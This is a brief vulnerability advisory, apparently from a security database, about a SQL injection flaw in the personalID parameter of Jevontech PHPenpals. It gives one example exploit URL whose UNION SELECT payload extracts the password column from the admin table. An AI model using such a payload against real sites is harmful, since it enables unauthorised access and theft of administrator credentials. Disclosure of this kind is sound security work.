Jevontech PHPenpals PersonalID SQL Injection Vulnerability

info
discussion
exploit
solution
references

Jevontech PHPenpals PersonalID SQL Injection Vulnerability

The following example was provided:

http://www.example.com/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/*